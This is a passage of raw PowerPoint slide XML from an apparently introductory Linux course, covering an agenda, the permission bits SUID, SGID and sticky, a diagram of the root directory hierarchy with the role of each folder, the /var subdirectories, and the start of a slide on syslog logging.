        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="4678680"/>
            <a:ext cx="807720" cy="48482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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SUID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9022080" y="4678680"/>
            <a:ext cx="807720" cy="48482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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SGID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9966960" y="4678680"/>
            <a:ext cx="1005840" cy="48482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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sticky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="10394950" y="5163502"/>
            <a:ext cx="74930" cy="404816"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="41275" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9425940" y="5163502"/>
            <a:ext cx="38100" cy="404816"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="41275" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8481060" y="5163502"/>
            <a:ext cx="162560" cy="404816"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="41275"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6390442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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627489813"/>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Linux Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47451" y="3271260"/>
            <a:ext cx="1387781" cy="1315754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Root Directory</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Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2912695" y="1502115"/>
            <a:ext cx="1501647" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>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/bin/</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>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/boot/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>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/dev/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>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etc</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27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>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/home/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>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/lib/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>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/media</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30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>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mnt</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31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>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/opt/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>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sbin</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33" name="Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>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srv</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34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>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tmp</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35" name="Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>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usr</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36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763265"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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var</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37" name="Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>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/root/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>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proc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="1656360"/>
            <a:ext cx="1477468" cy="2272777"/>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42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="1964851"/>
            <a:ext cx="1477466" cy="1964286"/>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45" name="Straight Connector 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="2273340"/>
            <a:ext cx="1477466" cy="1655797"/>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52" name="Straight Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="2581830"/>
            <a:ext cx="1477465" cy="1347307"/>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54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="2890319"/>
            <a:ext cx="1477466" cy="1038818"/>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56" name="Straight Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="3198810"/>
            <a:ext cx="1477465" cy="730327"/>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58" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477465" cy="2354571"/>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60" name="Straight Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477466" cy="2046081"/>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62" name="Straight Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477466" cy="1737592"/>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64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477468" cy="1429101"/>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66" name="Straight Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477469" cy="195142"/>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68" name="Straight Connector 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="3815790"/>
            <a:ext cx="1477463" cy="113347"/>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70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1435232" y="3507300"/>
            <a:ext cx="1477465" cy="421837"/>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72" name="Straight Connector 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477468" cy="812122"/>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74" name="Straight Connector 73"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477466" cy="1120612"/>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76" name="Straight Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435232" y="3929137"/>
            <a:ext cx="1477468" cy="503632"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4414336" y="1502115"/>
            <a:ext cx="5108211" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Rectangle 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>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Essential user command </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>inaries</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Rectangle 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>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Static files of Boot Loader</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95" name="Rectangle 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>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Device files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96" name="Rectangle 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>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Host-specific system configuration</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97" name="Rectangle 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>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User home directories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98" name="Rectangle 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>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Shared libraries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99" name="Rectangle 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>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Mount point for removable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> media</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0" name="Rectangle 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>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Mount point for file systems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1" name="Rectangle 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>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Add-on application software packages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2" name="Rectangle 101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>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System binaries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3" name="Rectangle 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>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Data for services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4" name="Rectangle 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>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Temp files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5" name="Rectangle 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>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User utilities and applications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6" name="Rectangle 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763266"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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Variable files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7" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>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Home directory for root user</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08" name="Rectangle 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>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Virtual </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>filesystem</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> for Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Rectangle 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10273365" y="5512483"/>
            <a:ext cx="1501641" cy="308490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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/log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="73" idx="1"/>
            <a:endCxn id="106" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9522537" y="5666728"/>
            <a:ext cx="750828" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Rectangle 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10273360" y="5203993"/>
            <a:ext cx="1501641" cy="308490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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/lib</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10273360" y="5820972"/>
            <a:ext cx="1501641" cy="308490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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/spool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10273360" y="6129463"/>
            <a:ext cx="1501641" cy="308490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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tmp</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81" name="Rectangle 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10273360" y="4895502"/>
            <a:ext cx="1501641" cy="308490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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/cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20758110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Syslog: System logging protocol to capture system logs or event messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux distributions utilize slightly different logging daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
